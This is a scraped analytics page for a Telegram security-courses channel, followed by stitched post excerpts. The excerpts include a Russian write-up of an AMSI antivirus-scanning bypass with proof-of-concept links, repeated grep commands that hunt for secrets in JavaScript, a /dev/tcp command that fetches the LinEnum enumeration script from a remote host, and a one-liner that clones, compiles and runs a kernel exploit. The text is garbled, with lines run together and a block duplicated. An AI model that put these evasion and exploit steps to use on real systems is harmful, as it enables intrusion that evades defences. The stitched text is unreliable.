All Security Engineering Courses
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Show more📈 Analytical overview of Telegram channel All Security Engineering Courses
Channel All Security Engineering Courses (@allsecurityengineeringcourses) in the English language segment is an active participant. Currently, the community unites 19 203 subscribers, ranking 6 659 in the Technologies & Applications category and 34 121 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 19 203 subscribers.
According to the latest data from 16 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 106 over the last 30 days and by 0 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 16.25%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
- Post reach: On average, each post receives 0 views. Within the first day, a publication typically gains 0 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 0.
- Thematic interests: Content is focused on key topics such as git, strace, github, linux, docker.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Thanks to the high frequency of updates (latest data received on 17 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
NtProtectVirtualMemory на страницу памяти, содержащую AmsiScanBuffer, ставится PAGE_GUARD. При доступе к этой странице возникает STATUS_GUARD_PAGE_VIOLATION, который перехватывается через VEH.
Если исключение пришло именно на AmsiScanBuffer, хэндлер подменяет результат на AMSI_RESULT_CLEAN и делает early return, эмулируя завершение функции без патча её байтов.
Так как guard-page — одноразовая ловушка, после первого срабатывания защита снимается. Поэтому в обработчике дополнительно используется Trap Flag: затем ловится STATUS_SINGLE_STEP, и PAGE_GUARD навешивается повторно.
Итог: байты функции остаются нетронутыми, а Dr0–Dr3 в этом варианте не используются, поэтому исчезают артефакты, характерные для inline patching и классических HWBP-обходов. Но это не означает «недетектируемость» вообще — современные поведенческие детекты всё ещё возможны.
В улучшенном варианте (VEH²) hardware breakpoint выставляется прямо через CONTEXT.Dr* внутри самого VEH, без вызова SetThreadContext / NtSetContextThread. Это убирает один из заметных telemetry-path, на который отдельно обращают внимание исследователи.
📖 Research
🔗 shigshag.com/blog/amsi_page_guard
🔗 crowdstrike.com/blog/crowdstrike-investigates-threat-of-patchless-amsi-bypass-attacks/
💻 PoC
🔗 github.com/vxCrypt0r/AMSI_VEH
🔗 fluxsec.red/veh-squared-rust
#amsi #evasion #redteam #windows #maldevfind /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
• Поиск API-ключей и секретов
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
• Обнаружение опасных вызовов функций
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
• Проверка манипуляций с URL
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
• Поиск междоменных запросов
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• Анализ использования postMessage
cat * | grep -r "postMessage"
• Поиск захардкоженных URL или эндпоинтов
cat * | grep -rE "https?://|www\."
• Поиск отладочной информации
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
• Исследование обработки пользовательского ввода
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
• Поиск API-ключей и секретов
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"
• Обнаружение опасных вызовов функций
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"
• Проверка манипуляций с URL
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"
• Поиск междоменных запросов
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• Анализ использования postMessage
cat * | grep -r "postMessage"
• Поиск захардкоженных URL или эндпоинтов
cat * | grep -rE "https?://|www\."
• Поиск отладочной информации
cat * | grep -rE "console\.log|debugger|alert|console\.dir"
• Исследование обработки пользовательского ввода
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"exec 3<>/dev/tcp/10.10.10.32/80
HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
Print the Response
cat <&3One-line specialgit clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
📱 https://github.com/V4bel/dirtyfrag